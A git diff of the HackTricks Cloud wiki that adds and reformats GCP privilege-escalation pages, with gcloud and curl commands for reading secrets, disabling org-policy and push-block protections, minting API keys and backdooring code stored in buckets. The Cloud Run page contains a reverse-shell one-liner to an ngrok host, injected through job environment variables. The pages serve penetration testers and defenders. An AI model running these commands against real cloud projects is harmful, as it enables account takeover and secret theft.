-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md
new file mode 100644
index 000000000..8cd87c332
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md
@@ -0,0 +1,25 @@
+# GCP - Orgpolicy Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## orgpolicy
+
+### `orgpolicy.policy.set`
+
+An attacker leveraging **orgpolicy.policy.set** can manipulate organizational policies, which will allow him to remove certain restrictions impeding specific operations. For instance, the constraint **appengine.disableCodeDownload** usually blocks downloading of App Engine source code. However, by using **orgpolicy.policy.set**, an attacker can deactivate this constraint, thereby gaining access to download the source code, despite it initially being protected.
+
+```bash
+# Get info
+gcloud resource-manager org-policies describe  [--folder  | --organization  | --project ]
+
+# Disable
+gcloud resource-manager org-policies disable-enforce  [--folder  | --organization  | --project ]
+```
+
+A python script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/orgpolicy.policy.set.py).
+
+## References
+
+- [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md
new file mode 100644
index 000000000..f0537d23d
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md
@@ -0,0 +1,37 @@
+# GCP - Pubsub Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## PubSub
+
+Get more information in:
+
+{{#ref}}
+../gcp-services/gcp-pub-sub.md
+{{#endref}}
+
+### `pubsub.snapshots.create`
+
+The snapshots of topics **contain the current unACKed messages and every message after it**. You could create a snapshot of a topic to **access all the messages**, **avoiding access the topic directly**.
+
+### **`pubsub.snapshots.setIamPolicy`**
+
+Assign the pervious permissions to you.
+
+### `pubsub.subscriptions.create`
+
+You can create a push subscription in a topic that will be sending all the received messages to the indicated URL
+
+### **`pubsub.subscriptions.update`**
+
+Set your own URL as push endpoint to steal the messages.
+
+### `pubsub.subscriptions.consume`
+
+Access messages using the subscription.
+
+### `pubsub.subscriptions.setIamPolicy`
+
+Give yourself any of the preiovus permissions
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md
new file mode 100644
index 000000000..9f69d21fa
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md
@@ -0,0 +1,19 @@
+# GCP - Resourcemanager Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## resourcemanager
+
+### `resourcemanager.organizations.setIamPolicy`
+
+Like in the exploitation of `iam.serviceAccounts.setIamPolicy`, this permission allows you to **modify** your **permissions** against **any resource** at **organization** level. So, you can follow the same exploitation example.
+
+### `resourcemanager.folders.setIamPolicy`
+
+Like in the exploitation of `iam.serviceAccounts.setIamPolicy`, this permission allows you to **modify** your **permissions** against **any resource** at **folder** level. So, you can follow the same exploitation example.
+
+### `resourcemanager.projects.setIamPolicy`
+
+Like in the exploitation of `iam.serviceAccounts.setIamPolicy`, this permission allows you to **modify** your **permissions** against **any resource** at **project** level. So, you can follow the same exploitation example.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md
similarity index 58%
rename from pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md
rename to src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md
index 4d01c56b0..08298f6be 100644
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md
@@ -1,27 +1,14 @@
 # GCP - Run Privesc
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Cloud Run
 
 For more information about Cloud Run check:
 
-{% content-ref url="../gcp-services/gcp-cloud-run-enum.md" %}
-[gcp-cloud-run-enum.md](../gcp-services/gcp-cloud-run-enum.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-services/gcp-cloud-run-enum.md
+{{#endref}}
 
 ### `run.services.create` , `iam.serviceAccounts.actAs`, **`run.routes.invoke`**
 
@@ -91,27 +78,12 @@ Give yourself the previous permissions over Cloud Jobs.
 
 Abuse the env variables of a job execution to execute arbitrary code and get a reverse shell to dump the contents of the container (source code) and access the SA inside the metadata:
 
-{% code overflow="wrap" %}
 ```bash
 gcloud beta run jobs execute job-name --region  --update-env-vars="PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=/bin/bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/14195 0>&1' #%s"
 ```
-{% endcode %}
 
 ## References
 
-* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
+- [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md
new file mode 100644
index 000000000..f63af9cf7
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md
@@ -0,0 +1,38 @@
+# GCP - Secretmanager Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## secretmanager
+
+For more information about secretmanager:
+
+{{#ref}}
+../gcp-services/gcp-secrets-manager-enum.md
+{{#endref}}
+
+### `secretmanager.versions.access`
+
+This give you access to read the secrets from the secret manager and maybe this could help to escalate privielegs (depending on which information is sotred inside the secret):
+
+```bash
+# Get clear-text of version 1 of secret: ""
+gcloud secrets versions access 1 --secret=""
+```
+
+As this is also a post exploitation technique it can be found in:
+
+{{#ref}}
+../gcp-post-exploitation/gcp-secretmanager-post-exploitation.md
+{{#endref}}
+
+### `secretmanager.secrets.setIamPolicy`
+
+This give you access to give you access to read the secrets from the secret manager, like using:
+
+```bash
+gcloud secrets add-iam-policy-binding  \
+  --member="serviceAccount:@$PROJECT_ID.iam.gserviceaccount.com" \
+  --role="roles/secretmanager.secretAccessor"
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md
similarity index 62%
rename from pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md
rename to src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md
index e7c58e725..acfdea07f 100644
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md
@@ -1,19 +1,6 @@
 # GCP - Serviceusage Privesc
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## serviceusage
 
@@ -23,29 +10,25 @@ Therefore, with an API key you can make that company pay for your use of the API
 
 To learn other permissions and ways to generate API keys check:
 
-{% content-ref url="gcp-apikeys-privesc.md" %}
-[gcp-apikeys-privesc.md](gcp-apikeys-privesc.md)
-{% endcontent-ref %}
+{{#ref}}
+gcp-apikeys-privesc.md
+{{#endref}}
 
 ### `serviceusage.apiKeys.create`
 
 An undocumented API was found that can be used to **create API keys:**
 
-{% code overflow="wrap" %}
 ```bash
 curl -XPOST "https://apikeys.clients6.google.com/v1/projects//apiKeys?access_token=$(gcloud auth print-access-token)"
 ```
-{% endcode %}
 
 ### `serviceusage.apiKeys.list`
 
 Another undocumented API was found for listing API keys that have already been created (the API keys appears in the response):
 
-{% code overflow="wrap" %}
 ```bash
 curl "https://apikeys.clients6.google.com/v1/projects//apiKeys?access_token=$(gcloud auth print-access-token)"
 ```
-{% endcode %}
 
 ### **`serviceusage.services.enable`** , **`serviceusage.services.use`**
 
@@ -53,7 +36,7 @@ With these permissions an attacker can enable and use new services in the projec
 
 ## **References**
 
-* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/)
+- [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/)
 
 

 
@@ -65,7 +48,7 @@ Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family),
 
 Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 
-**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
 
 **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)\*\*\*\*
 
diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md
new file mode 100644
index 000000000..447045572
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md
@@ -0,0 +1,87 @@
+# GCP - Sourcerepos Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Source Repositories
+
+For more information about Source Repositories check:
+
+{{#ref}}
+../gcp-services/gcp-source-repositories-enum.md
+{{#endref}}
+
+### `source.repos.get`
+
+With this permission it's possible to download the repository locally:
+
+```bash
+gcloud source repos clone  --project=
+```
+
+### `source.repos.update`
+
+A principal with this permission **will be able to write code inside a repository cloned with `gcloud source repos clone `**. But note that this permission cannot be attached to custom roles, so it must be given via a predefined role like:
+
+- Owner
+- Editor
+- Source Repository Administrator (`roles/source.admin`)
+- Source Repository Writer (`roles/source.writer`)
+
+To write just perform a regular **`git push`**.
+
+### `source.repos.setIamPolicy`
+
+With this permission an attacker could grant himself the previous permissions.
+
+### Secret access
+
+If the attacker has **access to the secrets** where the tokens are stored, he will be able to steal them. For more info about how to access a secret check:
+
+{{#ref}}
+gcp-secretmanager-privesc.md
+{{#endref}}
+
+### Add SSH keys
+
+It's possible to **add ssh keys to the Source Repository project** in the web console. It makes a post request to **`/v1/sshKeys:add`** and can be configured in [https://source.cloud.google.com/user/ssh_keys](https://source.cloud.google.com/user/ssh_keys)
+
+Once your ssh key is set, you can access a repo with:
+
+```bash
+git clone ssh://username@domain.com@source.developers.google.com:2022/p//r/
+```
+
+And then use **`git`** commands are per usual.
+
+### Manual Credentials
+
+It's possible to create manual credentials to access the Source Repositories:
+
+

+
+Clicking on the first link it will direct you to [https://source.developers.google.com/auth/start?scopes=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform\&state\&authuser=3](https://source.developers.google.com/auth/start?scopes=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform&state&authuser=3)
+
+Which will prompt an **Oauth authorization prompt** to give access to **Google Cloud Development**. So you will need either the **credentials of the user** or an **open session in the browser** for this.
+
+This will send you to a page with a **bash script to execute** and configure a git cookie in **`$HOME/.gitcookies`**
+
+

+
+Executing the script you can then use git clone, push... and it will work.
+
+### `source.repos.updateProjectConfig`
+
+With this permission it's possible to disable Source Repositories default protection to not upload code containing Private Keys:
+
+```bash
+gcloud source project-configs update --disable-pushblock
+```
+
+You can also configure a different pub/sub topic or even disable it completely:
+
+```bash
+gcloud source project-configs update --remove-topic=REMOVE_TOPIC
+gcloud source project-configs update --remove-topic=UPDATE_TOPIC
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md
similarity index 64%
rename from pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md
rename to src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md
index 3a3594bdd..29193d5f5 100644
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md
@@ -1,34 +1,21 @@
 # GCP - Storage Privesc
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Storage
 
 Basic Information:
 
-{% content-ref url="../gcp-services/gcp-storage-enum.md" %}
-[gcp-storage-enum.md](../gcp-services/gcp-storage-enum.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-services/gcp-storage-enum.md
+{{#endref}}
 
 ### `storage.objects.get`
 
 This permission allows you to **download files stored inside Cloud Storage**. This will potentially allow you to escalate privileges because in some occasions **sensitive information is saved there**. Moreover, some GCP services stores their information in buckets:
 
-* **GCP Composer**: When you create a Composer Environment the **code of all the DAGs** will be saved inside a **bucket**. These tasks might contain interesting information inside of their code.
-* **GCR (Container Registry)**: The **image** of the containers are stored inside **buckets**, which means that if you can read the buckets you will be able to download the images and **search for leaks and/or source code**.
+- **GCP Composer**: When you create a Composer Environment the **code of all the DAGs** will be saved inside a **bucket**. These tasks might contain interesting information inside of their code.
+- **GCR (Container Registry)**: The **image** of the containers are stored inside **buckets**, which means that if you can read the buckets you will be able to download the images and **search for leaks and/or source code**.
 
 ### `storage.objects.setIamPolicy`
 
@@ -38,15 +25,14 @@ You can give you permission to **abuse any of the previous scenarios of this sec
 
 For an example on how to modify permissions with this permission check this page:
 
-{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md" %}
-[gcp-public-buckets-privilege-escalation.md](../gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md
+{{#endref}}
 
 ### `storage.hmacKeys.create`
 
 Cloud Storage's "interoperability" feature, designed for **cross-cloud interactions** like with AWS S3, involves the **creation of HMAC keys for Service Accounts and users**. An attacker can exploit this by **generating an HMAC key for a Service Account with elevated privileges**, thus **escalating privileges within Cloud Storage**. While user-associated HMAC keys are only retrievable via the web console, both the access and secret keys remain **perpetually accessible**, allowing for potential backup access storage. Conversely, Service Account-linked HMAC keys are API-accessible, but their access and secret keys are not retrievable post-creation, adding a layer of complexity for continuous access.
 
-{% code overflow="wrap" %}
 ```bash
 # Create key
 gsutil hmac create  # You might need to execute this inside a VM instance
@@ -76,7 +62,6 @@ gsutil ls gs://[BUCKET_NAME]
 # Restore
 gcloud config set pass_credentials_to_gsutil true
 ```
-{% endcode %}
 
 Another exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py).
 
@@ -90,14 +75,14 @@ A very **common exploitation** of buckets where you can write in cloud is in cas
 
 **Composer** is **Apache Airflow** managed inside GCP. It has several interesting features:
 
-* It runs inside a **GKE cluster**, so the **SA the cluster uses is accessible** by the code running inside Composer
-* All the components of a composer environments (**code of DAGs**, plugins and data) are stores inside a GCP bucket. If the attacker has read and write permissions over it, he could monitor the bucket and **whenever a DAG is created or updated, submit a backdoored version** so the composer environment will get from the storage the backdoored version.
+- It runs inside a **GKE cluster**, so the **SA the cluster uses is accessible** by the code running inside Composer
+- All the components of a composer environments (**code of DAGs**, plugins and data) are stores inside a GCP bucket. If the attacker has read and write permissions over it, he could monitor the bucket and **whenever a DAG is created or updated, submit a backdoored version** so the composer environment will get from the storage the backdoored version.
 
 **You can find a PoC of this attack in the repo:** [**https://github.com/carlospolop/Monitor-Backdoor-Composer-DAGs**](https://github.com/carlospolop/Monitor-Backdoor-Composer-DAGs)
 
 ### Cloud Functions
 
-* Cloud Functions code is stored in Storage and whenever a new version is created the code is pushed to the bucket and then the new container is build from this code. Therefore, **overwriting the code before the new version gets built it's possible to make the cloud function execute arbitrary code**.
+- Cloud Functions code is stored in Storage and whenever a new version is created the code is pushed to the bucket and then the new container is build from this code. Therefore, **overwriting the code before the new version gets built it's possible to make the cloud function execute arbitrary code**.
 
 **You can find a PoC of this attack in the repo:** [**https://github.com/carlospolop/Monitor-Backdoor-Cloud-Functions**](https://github.com/carlospolop/Monitor-Backdoor-Cloud-Functions)
 
@@ -111,36 +96,22 @@ However, with read & write access over this bucket, it's possible to escalate pr
 
 The mentioned attack can be performed in a lot of different ways, all of them start by monitoring the `staging..appspot.com` bucket:
 
-* Upload the complete new code of the AppEngine version to a different and available bucket and prepare a **`manifest.json` file with the new bucket name and sha1 hashes of them**. Then, when a new version is created inside the bucket, you just need to modify the `manifest.json` file and upload the malicious one.
-* Upload a modified `requirements.txt` version that will use a the **malicious dependencies code and update the `manifest.json`** file with the new filename, URL and the hash of it.
-* Upload a **modified `main.py` or `app.yaml` file that will execute the malicious code** and update the `manifest.json` file with the new filename, URL and the hash of it.
+- Upload the complete new code of the AppEngine version to a different and available bucket and prepare a **`manifest.json` file with the new bucket name and sha1 hashes of them**. Then, when a new version is created inside the bucket, you just need to modify the `manifest.json` file and upload the malicious one.
+- Upload a modified `requirements.txt` version that will use a the **malicious dependencies code and update the `manifest.json`** file with the new filename, URL and the hash of it.
+- Upload a **modified `main.py` or `app.yaml` file that will execute the malicious code** and update the `manifest.json` file with the new filename, URL and the hash of it.
 
 **You can find a PoC of this attack in the repo:** [**https://github.com/carlospolop/Monitor-Backdoor-AppEngine**](https://github.com/carlospolop/Monitor-Backdoor-AppEngine)
 
 ### GCR
 
-* **Google Container Registry** stores the images inside buckets, if you can **write those buckets** you might be able to **move laterally to where those buckets are being run.**
-  * The bucket used by GCR will have an URL similar to `gs://.artifacts..appspot.com` (The top level subdomains are specified [here](https://cloud.google.com/container-registry/docs/pushing-and-pulling)).
+- **Google Container Registry** stores the images inside buckets, if you can **write those buckets** you might be able to **move laterally to where those buckets are being run.**
+  - The bucket used by GCR will have an URL similar to `gs://.artifacts..appspot.com` (The top level subdomains are specified [here](https://cloud.google.com/container-registry/docs/pushing-and-pulling)).
 
-{% hint style="success" %}
-This service is deprecated so this attack is no longer useful. Moreover, Artifact Registry, the service that substitutes this one, does't store the images in buckets.
-{% endhint %}
+> [!TIP]
+> This service is deprecated so this attack is no longer useful. Moreover, Artifact Registry, the service that substitutes this one, does't store the images in buckets.
 
 ## **References**
 
-* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#:\~:text=apiKeys.-,create,privileges%20than%20our%20own%20user.](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/)
+- [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#:\~:text=apiKeys.-,create,privileges%20than%20our%20own%20user.](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md
similarity index 50%
rename from pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md
rename to src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md
index 5ee421caf..35e558e54 100644
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md
@@ -1,27 +1,14 @@
 # GCP - Workflows Privesc
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Workflows
 
 Basic Information:
 
-{% content-ref url="../gcp-services/gcp-workflows-enum.md" %}
-[gcp-workflows-enum.md](../gcp-services/gcp-workflows-enum.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-services/gcp-workflows-enum.md
+{{#endref}}
 
 ### `workflows.workflows.create`, `iam.serviceAccounts.ActAs`, `workflows.executions.create`, (`workflows.workflows.get`, `workflows.operations.get`)
 
@@ -33,17 +20,17 @@ And here you can find an example of a connector that prints a secret:
 
 ```yaml
 main:
-    params: [input]
-    steps:
+  params: [input]
+  steps:
     - access_string_secret:
         call: googleapis.secretmanager.v1.projects.secrets.versions.accessString
         args:
-            secret_id: secret_name
-            version: 1
-            project_id: project-id
+          secret_id: secret_name
+          version: 1
+          project_id: project-id
         result: str_secret
     - returnOutput:
-            return: '${str_secret}'
+        return: "${str_secret}"
 ```
 
 Update from the CLI:
@@ -59,7 +46,6 @@ If you get an error like `ERROR: (gcloud.workflows.deploy) FAILED_PRECONDITION:
 
 If you don't have web access it's possible to trigger and see the execution of a Workflow with:
 
-{% code overflow="wrap" %}
 ```bash
 # Run execution with output
 gcloud workflows run  --location us-central1
@@ -73,11 +59,9 @@ gcloud workflows executions list 
 # Get execution info and output
 gcloud workflows executions describe projects//locations//workflows//executions/
 ```
-{% endcode %}
 
-{% hint style="danger" %}
-You can also check the output of previous executions to look for sensitive information
-{% endhint %}
+> [!CAUTION]
+> You can also check the output of previous executions to look for sensitive information
 
 Note that even if you get an error like `PERMISSION_DENIED: Permission 'workflows.operations.get' denied on...` because you don't have that permission, the workflow has been generated.
 
@@ -85,13 +69,11 @@ Note that even if you get an error like `PERMISSION_DENIED: Permission 'workflow
 
 According [**to the docs**](https://cloud.google.com/workflows/docs/authenticate-from-workflow) it's possible to use workflow steps that will send an HTTP request with the OAuth or OIDC token. However, just like in the case of [Cloud Scheduler](gcp-cloudscheduler-privesc.md), the HTTP request with the Oauth token must be to the host `.googleapis.com`.
 
-{% hint style="danger" %}
-Therefore, it's **possible to leak the OIDC token by indicating a HTTP endpoint** controlled by the user but to leak the **OAuth** token you would **need a bypass** for that protection. However, you are still able to **contact any GCP api to perform actions on behalf the SA** using either connectors or HTTP requests with the OAuth token.
-{% endhint %}
+> [!CAUTION]
+> Therefore, it's **possible to leak the OIDC token by indicating a HTTP endpoint** controlled by the user but to leak the **OAuth** token you would **need a bypass** for that protection. However, you are still able to **contact any GCP api to perform actions on behalf the SA** using either connectors or HTTP requests with the OAuth token.
 
 #### Oauth
 
-{% code overflow="wrap" %}
 ```yaml
     - step_A:
       call: http.post
@@ -101,7 +83,6 @@ Therefore, it's **possible to leak the OIDC token by indicating a HTTP endpoint*
               type: OAuth2
               scopes: OAUTH_SCOPE
 ```
-{% endcode %}
 
 #### OIDC
 
@@ -123,17 +104,4 @@ Therefore, it's **possible to leak the OIDC token by indicating a HTTP endpoint*
 
 With this permission instead of `workflows.workflows.create` it's possible to update an already existing workflow and perform the same attacks.
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
